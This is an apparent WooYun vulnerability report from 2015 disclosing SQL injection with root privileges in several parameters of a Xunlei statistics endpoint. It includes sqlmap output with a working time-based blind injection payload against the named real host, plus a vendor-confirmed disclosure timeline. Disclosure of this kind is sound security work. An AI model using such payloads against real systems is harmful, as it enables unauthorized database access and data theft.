漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-09: 厂商已经确认,细节仅向厂商公开
2015-09-19: 细节向核心白帽子及相关领域专家公开
2015-09-29: 细节向普通白帽子公开
2015-10-09: 细节向实习白帽子公开
2015-10-24: 细节向公众公开
简要描述:
迅雷分站多个参数SQL注入(root权限)
详细说明:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://stat.login.xunlei.com:1800/report?cnt=6&cmdid0=256&errorcode0=0&responsetime0=1&retrynum0=0&serverip0=88888&url0=tes&domain0=loginxl8.client.reg2t.sandai.net&b_type0=0&platform0=0&clientversion0=7.9.37.4952&cmdid1=258&errorcode1=0&responsetime1=0&retrynum1=0&serverip1=88888&url1=tes&domain1=loginxl8.client.reg2t.sandai.net&b_type1=0&platform1=0&clientversion1=7.9.37.4952&cmdid2=260&errorcode2=0&responsetime2=0&retrynum2=0&serverip2=88888&url2=tes&domain2=loginxl8.client.reg2t.sandai.net&b_type2=0&platform2=0&clientversion2=7.9.37.4952&cmdid3=53&errorcode3=0&responsetime3=0&retrynum3=0&url3=tes&domain3=loginxl8.client.reg2t.sandai.net&b_type3=0&platform3=0&clientversion3=7.9.37.4952&cmdid4=3&errorcode4=0&responsetime4=0&retrynum4=0&serverip4=88888&url4=tes&domain4=loginxl8.client.reg2t.sandai.net&b_type4=0&platform4=0&clientversion4=7.9.37.4952&cmdid5=8888&errorcode5=0&responsetime5=1&retrynum5=0&serverip5=88888&url5=tes&domain5=loginxl8.client.reg2t.sandai.net&b_type5=0&platform5=0&clientversion5=7.9.37.4952&serverip3=88888' AND (SELECT * FROM (SELECT(SLEEP(5)))noeX) AND 'Dbhx'='Dbhx
---
其中url1 ,platform3,platform4,serverip3,clientversion3
多个参数都存在SQL注入
漏洞证明:
修复方案:
修复
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:19
确认时间:2015-09-09 16:35
厂商回复:
感谢反馈!
最新状态:
暂无

